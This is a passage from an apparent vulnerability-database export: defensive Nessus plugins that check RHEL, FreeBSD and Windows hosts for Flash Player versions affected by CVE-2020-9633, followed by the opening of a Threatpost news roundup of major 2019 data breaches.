'content/dist/rhel/server/6/6Server/i386/resilientstorage/debug',\n 'content/dist/rhel/server/6/6Server/i386/resilientstorage/os',\n 'content/dist/rhel/server/6/6Server/i386/resilientstorage/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/supplementary/debug',\n 'content/dist/rhel/server/6/6Server/i386/supplementary/os',\n 'content/dist/rhel/server/6/6Server/i386/supplementary/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/highavailability/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/highavailability/os',\n 'content/dist/rhel/server/6/6Server/x86_64/highavailability/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/hpn/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/hpn/os',\n 'content/dist/rhel/server/6/6Server/x86_64/hpn/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/loadbalancer/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/loadbalancer/os',\n 'content/dist/rhel/server/6/6Server/x86_64/loadbalancer/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/optional/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/optional/os',\n 'content/dist/rhel/server/6/6Server/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/server/6/6Server/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/os',\n 'content/dist/rhel/server/6/6Server/x86_64/resilientstorage/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/resilientstorage/os',\n 'content/dist/rhel/server/6/6Server/x86_64/resilientstorage/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/sap-hana/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/sap-hana/os',\n 'content/dist/rhel/server/6/6Server/x86_64/sap-hana/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/sap/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/sap/os',\n 'content/dist/rhel/server/6/6Server/x86_64/sap/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/scalablefilesystem/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/scalablefilesystem/os',\n 'content/dist/rhel/server/6/6Server/x86_64/scalablefilesystem/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/supplementary/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/supplementary/os',\n 'content/dist/rhel/server/6/6Server/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/debug',\n 'content/dist/rhel/workstation/6/6Workstation/i386/optional/debug',\n 'content/dist/rhel/workstation/6/6Workstation/i386/optional/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/optional/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/oracle-java-rm/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/supplementary/debug',\n 'content/dist/rhel/workstation/6/6Workstation/i386/supplementary/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/supplementary/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/optional/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/optional/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/scalablefilesystem/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/scalablefilesystem/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/scalablefilesystem/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/supplementary/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/supplementary/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/supplementary/source/SRPMS',\n 'content/els/rhel/server/6/6Server/i386/debug',\n 'content/els/rhel/server/6/6Server/i386/optional/debug',\n 'content/els/rhel/server/6/6Server/i386/optional/os',\n 'content/els/rhel/server/6/6Server/i386/optional/source/SRPMS',\n 'content/els/rhel/server/6/6Server/i386/os',\n 'content/els/rhel/server/6/6Server/i386/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/debug',\n 'content/els/rhel/server/6/6Server/x86_64/optional/debug',\n 'content/els/rhel/server/6/6Server/x86_64/optional/os',\n 'content/els/rhel/server/6/6Server/x86_64/optional/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/os',\n 'content/els/rhel/server/6/6Server/x86_64/sap-hana/debug',\n 'content/els/rhel/server/6/6Server/x86_64/sap-hana/os',\n 'content/els/rhel/server/6/6Server/x86_64/sap-hana/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/sap/debug',\n 'content/els/rhel/server/6/6Server/x86_64/sap/os',\n 'content/els/rhel/server/6/6Server/x86_64/sap/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/source/SRPMS',\n 'content/fastrack/rhel/client/6/i386/debug',\n 'content/fastrack/rhel/client/6/i386/optional/debug',\n 'content/fastrack/rhel/client/6/i386/optional/os',\n 'content/fastrack/rhel/client/6/i386/optional/source/SRPMS',\n 'content/fastrack/rhel/client/6/i386/os',\n 'content/fastrack/rhel/client/6/i386/source/SRPMS',\n 'content/fastrack/rhel/client/6/x86_64/debug',\n 'content/fastrack/rhel/client/6/x86_64/optional/debug',\n 'content/fastrack/rhel/client/6/x86_64/optional/os',\n 'content/fastrack/rhel/client/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/client/6/x86_64/os',\n 'content/fastrack/rhel/client/6/x86_64/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/hpn/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/hpn/os',\n 'content/fastrack/rhel/computenode/6/x86_64/hpn/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/optional/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/optional/os',\n 'content/fastrack/rhel/computenode/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/os',\n 'content/fastrack/rhel/computenode/6/x86_64/scalablefilesystem/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/scalablefilesystem/os',\n 'content/fastrack/rhel/computenode/6/x86_64/scalablefilesystem/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/debug',\n 'content/fastrack/rhel/server/6/i386/highavailability/debug',\n 'content/fastrack/rhel/server/6/i386/highavailability/os',\n 'content/fastrack/rhel/server/6/i386/highavailability/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/loadbalancer/debug',\n 'content/fastrack/rhel/server/6/i386/loadbalancer/os',\n 'content/fastrack/rhel/server/6/i386/loadbalancer/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/optional/debug',\n 'content/fastrack/rhel/server/6/i386/optional/os',\n 'content/fastrack/rhel/server/6/i386/optional/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/os',\n 'content/fastrack/rhel/server/6/i386/resilientstorage/debug',\n 'content/fastrack/rhel/server/6/i386/resilientstorage/os',\n 'content/fastrack/rhel/server/6/i386/resilientstorage/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/debug',\n 'content/fastrack/rhel/server/6/x86_64/highavailability/debug',\n 'content/fastrack/rhel/server/6/x86_64/highavailability/os',\n 'content/fastrack/rhel/server/6/x86_64/highavailability/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/hpn/debug',\n 'content/fastrack/rhel/server/6/x86_64/hpn/os',\n 'content/fastrack/rhel/server/6/x86_64/hpn/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/loadbalancer/debug',\n 'content/fastrack/rhel/server/6/x86_64/loadbalancer/os',\n 'content/fastrack/rhel/server/6/x86_64/loadbalancer/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/optional/debug',\n 'content/fastrack/rhel/server/6/x86_64/optional/os',\n 'content/fastrack/rhel/server/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/os',\n 'content/fastrack/rhel/server/6/x86_64/resilientstorage/debug',\n 'content/fastrack/rhel/server/6/x86_64/resilientstorage/os',\n 'content/fastrack/rhel/server/6/x86_64/resilientstorage/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/scalablefilesystem/debug',\n 'content/fastrack/rhel/server/6/x86_64/scalablefilesystem/os',\n 'content/fastrack/rhel/server/6/x86_64/scalablefilesystem/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/i386/debug',\n 'content/fastrack/rhel/workstation/6/i386/optional/debug',\n 'content/fastrack/rhel/workstation/6/i386/optional/os',\n 'content/fastrack/rhel/workstation/6/i386/optional/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/i386/os',\n 'content/fastrack/rhel/workstation/6/i386/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/x86_64/debug',\n 'content/fastrack/rhel/workstation/6/x86_64/optional/debug',\n 'content/fastrack/rhel/workstation/6/x86_64/optional/os',\n 'content/fastrack/rhel/workstation/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/x86_64/os',\n 'content/fastrack/rhel/workstation/6/x86_64/scalablefilesystem/debug',\n 'content/fastrack/rhel/workstation/6/x86_64/scalablefilesystem/os',\n 'content/fastrack/rhel/workstation/6/x86_64/scalablefilesystem/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/x86_64/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'flash-plugin-32.0.0.387-1.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n var enterprise_linux_flag = rhel_repo_urls_has_content_dist_rhel(repo_urls:repo_relative_urls);\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp']) && !enterprise_linux_flag) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat() + flash_plugin_caveat;\n else extra = rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat;\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'flash-plugin');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-13T14:32:15", "description": "Adobe reports :\n\n- This update resolves a use-after-free vulnerability that could lead to arbitrary code execution (CVE-2020-9633).", "cvss3": {}, "published": "2020-06-10T00:00:00", "type": "nessus", "title": "FreeBSD : Flash Player -- arbitrary code execution (196b31b8-aa9a-11ea-a59a-6451062f0f7a)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9633"], "modified": "2020-06-22T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-flashplayer", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_196B31B8AA9A11EAA59A6451062F0F7A.NASL", "href": "https://www.tenable.com/plugins/nessus/137285", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(137285);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/22\");\n\n script_cve_id(\"CVE-2020-9633\");\n\n script_name(english:\"FreeBSD : Flash Player -- arbitrary code execution (196b31b8-aa9a-11ea-a59a-6451062f0f7a)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Adobe reports :\n\n- This update resolves a use-after-free vulnerability that could lead\nto arbitrary code execution (CVE-2020-9633).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb20-30.html\"\n );\n # https://vuxml.freebsd.org/freebsd/196b31b8-aa9a-11ea-a59a-6451062f0f7a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bca34265\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-flashplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-flashplayer<32.0.0.387\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-12T14:19:15", "description": "The version of Adobe Flash Player installed on the remote Windows host is equal or prior to version 32.0.0.371. It is, therefore, affected by an use after free vulnerability. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to execute arbitrary code within the context of the user.", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "Adobe Flash Player <= 32.0.0.371 (APSB20-30)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9633"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB20-30.NASL", "href": "https://www.tenable.com/plugins/nessus/137253", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137253);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2020-9633\");\n script_xref(name:\"IAVA\", value:\"2020-A-0246-S\");\n\n script_name(english:\"Adobe Flash Player <= 32.0.0.371 (APSB20-30)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows host is equal or prior to version 32.0.0.371. It is,\ntherefore, affected by an use after free vulnerability. An unauthenticated, remote attacker can exploit this, via a\nspecially crafted file, to execute arbitrary code within the context of the user.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb20-30.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 32.0.0.387 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9633\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if (isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if (isnull(ver))\n continue;\n\n # <= 32.0.0.371\n if (ver_compare(ver:ver,fix:\"32.0.0.371\",strict:FALSE) <= 0)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n fix = \"32.0.0.387\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"32.0.0.387\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n if (variant == \"Chrome\")\n fix = \"Upgrade to a version of Google Chrome running Flash Player 32.0.0.387\";\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 32.0.0.387 (Chrome PepperFlash)';\n else if (!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2020-10-15T22:27:02", "description": " * [](<https://threatpost.com/category/privacy/> \"Data Breach\" )\n\n**Top 10 Breaches and Leaky Server Screw Ups of 2019**\n\nFrom massive credential spills on the Dark Web and hacked data to card-skimming and rich profiles exposed by way of cloud misconfigurations, 2019 was a notable year for data breaches. Big names like Capital One, Macy\u2019s and Sprint were impacted, as was the entire country of Ecuador and supply-chain companies like the American Medical Collection Agency. Here are our Top 10 data leak moments of the year.\n\n * [](<https://threatpost.com/773m-credentials-dark-web/140972/> \"Password draft\" )\n\n**Collections 1-4 Spill Millions of Credentials on the Dark Web**\n\nThe year started out with a bang when a huge trove of data \u2013 containing 773 million unique email addresses and passwords \u2013 [was discovered](<https://threatpost.com/773m-credentials-dark-web/140972/>) on a popular underground hacking forum. The credential spill was dubbed \u201cCollection #1\u201d and totaled 87GB of data, with records culled from breaches that occurred as far back as 2010, including the well-known compromise of Yahoo. It was one of the largest jackpots ever seen when it comes to account-compromise efforts. [Collections 2-4 soon followed](<https://threatpost.com/fourth-credential-spill-dreammarket/142901/>), and ultimately more than 840 million account records from 38 companies appeared for sale on the Dark Web in February.\n\n * [](<https://threatpost.com/amca-healthcare-hack-widens-opko/145453/> \"amca draft2\" )\n\n**AMCA Supply-Chain Breach Impacts 20.1 Million**\n\nA hack of the American Medical Collection Agency (AMCA), a third-party bill collection vendor, impacted 20.1 million patients [over the summer](<https://threatpost.com/amca-healthcare-hack-widens-opko/145453/>), exposing personally identifiable information such as names, addresses and dates of birth, and also payment data. Three clinical laboratories offering blood tests and the like that relied on AMCA to process a portion of their consumer billing were hit: 12 million patients from Quest Diagnostics, another 7.7 million patients from LabCorp and 400,000 victims from OPKO Health.\n\n * [](<https://threatpost.com/aws-arrest-data-breach-capital-one/146758/> \"capital-one\" )\n\n**Capital One: Another Year, Another Major FinServ Breach**\n\nIn July, a massive breach of Capital One customer data hit more than 100 million people in the U.S. and 6 million in Canada. Thanks to a cloud misconfiguration, a hacker [was able to access](<https://threatpost.com/aws-arrest-data-breach-capital-one/146758/>) credit applications, Social Security numbers and bank account numbers in one of the biggest data breaches to ever hit a financial services company \u2014 putting it in the same league in terms of size as the Equifax incident of 2017. The FBI arrested a suspect in the case: A former engineer at Amazon Web Services (AWS), Paige Thompson, after she boasted about the data theft on GitHub. Researchers said that Capital One victims are going to be phished for years to come \u2013 long after their 12 months\u2019 of credit monitoring is done.\n\n * [](<https://threatpost.com/267m-facebook-phone-numbers-exposed-online/151327/> \"Facebook draft\" )\n\n**Facebook \u2018s Year of Breach Problems**\n\nFacebook had a bad year for breaches, including the December emergence of a [hacked database](<https://threatpost.com/267m-facebook-phone-numbers-exposed-online/151327/>) containing the names, phone numbers and Facebook user IDs of 267 million platform users. The data may have been stolen from [Facebook\u2019s developer API](<https://threatpost.com/facebook-privacy-breach-developers-group-data/149930/>) before the company restricted API access to phone numbers and other data in 2018. And in September, an open server was [discovered leaking](<https://techcrunch.com/2019/09/04/facebook-phone-numbers-exposed/>) hundreds of millions of Facebook user phone numbers. In April, [researchers found two separate datasets](<https://threatpost.com/facebook-and-amazon-are-locked-in-a-blame-game-over-leaked-data-whos-really-to-blame/143467/>), held by two app developers (Cultura Colectiva and At the Pool). The actual data source for the records (like account names and personal data) in these databases was Facebook.\n\n * [](<https://threatpost.com/marketing-analytics-leaks-deep-profiles-ecuador/148363/> \"Ecuador\" )\n\n**Deep Profiles for the Entire Population of Ecuador Are Exposed**\n\nIn September it came to light that the entire population of Ecuador (as well as Julian Assange) [had been impacted](<https://threatpost.com/marketing-analytics-leaks-deep-profiles-ecuador/148363/>) by an open database with rich, detailed life information collected from public-sector sources by a marketing analytics company. The trove of data offered any attacker the ability to cross-reference and combine the data into a highly personal, richly detailed view of a person\u2019s life. The records, for 20 million individuals, were gleaned from Ecuadorian government registries, an automotive association called Aeade, and the Ecuadorian national bank. Ecuador has about 16.5 million citizens in total (some of the entries were for deceased persons).\n\n * [](<https://threatpost.com/data-enriched-profiles-1-2b-leak/150560/> \"data profile\" )\n\n**1.2B Rich Profiles Exposed By Data Brokers**\n\nIn a similar incident to the Ecuador debacle, an open Elasticsearch server emerged in December that exposed the rich profiles of more than 1.2 billion people. The database [consisted of scraped information](<https://threatpost.com/data-enriched-profiles-1-2b-leak/150560/>) from social media sources like Facebook and LinkedIn, combined with names, personal and work email addresses, phone numbers, Twitter and Github URLs and other data. Taken together, the profiles provide a 360-degree view of individuals, including their employment and education histories. All of the information was unprotected, with no login needed to access it. The data was linked to People Data Labs (PDL) and OxyData[.]io.\n\n * [](<https://threatpost.com/imperva-data-breach-cloud-misconfiguration/149127/> \"Imperva\" )\n\n**Security Specialist Imperva Smarts from Cloud Misconfiguration**\n\nIn an ironic turn of events, cybersecurity company Imperva allowed hackers to steal and use an administrative Amazon Web Services (AWS) API key in one of 